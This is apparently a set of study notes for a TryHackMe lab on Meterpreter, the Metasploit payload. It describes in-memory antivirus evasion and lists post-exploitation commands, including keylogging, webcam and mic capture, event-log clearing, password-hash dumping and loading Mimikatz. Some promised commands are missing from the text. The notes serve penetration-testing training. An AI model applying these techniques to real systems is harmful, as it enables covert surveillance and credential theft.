Meterpreter

https://tryhackme.com/r/room/meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture.

Meterpreter runs on a target system without being installed on it. It runs in memory (RAM - Random Access Memory) and does not write itself to the disk on the target. Meterpreter thus tries to avoid being detected by antivirus and is seen as a process and does not have a file on the target system. Meterpreter also uses encrypted communication with the server where Metasploit runs.

Use the following command to display meterpreter payloads:

Meterpreter Commands

Core commands:

  • ?: Help Menu

  • background: Backgrounds current session

  • exit: Terminates session

  • guid: Get session GUID

  • info: Display post module information

  • irb: Opens interactive ruby shell

  • load: Loads one or more meterpreter extensions

  • migrate: Migrates meterpreter process to another process

  • run: Executes a meterpreter script or post module

  • sessions: Quickly switch to another session

File and networking commands:

  • search: Searches for files

  • upload: Uploads file or directory

  • download: Downloads a file or directory

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Allows to view and modify routing table

System commands:

  • clearev: Clears events logs

  • execute: Executes a command

  • getpid: Shows current process identifier

  • kill: Terminates process

  • reboot: Reboots remote computer

  • shell: Drops into system command shell

  • sysinfo: Gets information about remote system

Other commands:

  • idletime: Returns the number of seconds remote user is idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop

  • record_mic: Records audio from default microphone

  • webcam_chat: Starts video chat

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate privilege

  • hashdump: Dumps contents of SAM database

Post Exploitation

The migrate command is a way to migrate to another process to aid in continued interaction. This can be helpful to creat a more stable meterpreter session. It can also be used to conduct keylogger attacks by migrating to a process like word.exe, notepad.exe, or even a browser.

The following would be a sample command execution involving migration:

Post exploitation using meterpreter can be split into the following categories:

  • Gathering further intelligence about the target system

  • Searching for files, credentials, interfaces, and further information

  • Privilege escalation

  • Lateral movement

The following command can be used to load Mimikatz, a great tool for post exploitation and privilege escalation on Windows machines:

PreviousMetasploitNextKOTH

Last updated